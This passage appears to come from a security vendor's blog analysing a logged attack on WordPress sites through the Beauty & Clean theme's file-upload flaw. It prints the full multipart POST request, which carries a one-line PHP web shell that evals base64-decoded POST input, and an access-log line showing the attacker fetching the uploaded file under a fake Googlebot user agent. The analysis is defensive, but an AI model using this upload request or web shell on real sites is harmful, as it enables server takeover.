Looking better POST payload, header looks normal request:
--6dfe7e0d-B-- POST / HTTP/1.1 Referer: https://malware.expert/ User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0 Accept: */* Content-Type: multipart/form-data; boundary=(UploadBoundary) Host: malware.expert Content-Length: 436 Connection: Close
In the below HTTP Post, there were 2 parameters that started with yiw. This indicates that the attacker is likely trying to explpoit the Beauty & Clean Theme File Upload WordPress Vulnerability which is literally as simple as posting your backdoor file to the contact field via the sendmail action. If it succeeds, your file has been uploaded to the web server.
--6dfe7e0d-C--
--(UploadBoundary)
Content-Disposition: form-data; name="yiw_contact[]"; filename="82760469.php"
Content-Type: text/php
98765432198<?php $mujj = $_POST['chopper']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
--(UploadBoundary)
Content-Disposition: form-data; name="yiw_action"
sendemail
--(UploadBoundary)
Content-Disposition: form-data; name="id_form"
a_3_3
--(UploadBoundary)
Then the attacker tries to check fake Googlebot request, if vulnerability success:
195.154.242.146 - - [13/Nov/2016:21:39:57 +0200] "GET /wp-content/uploads/82760469.php HTTP/1.1" 500 710 "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
This attack is very active still, get lots off tries still customer websites. Our Malware Expert – Mod_Security rules, block this attack.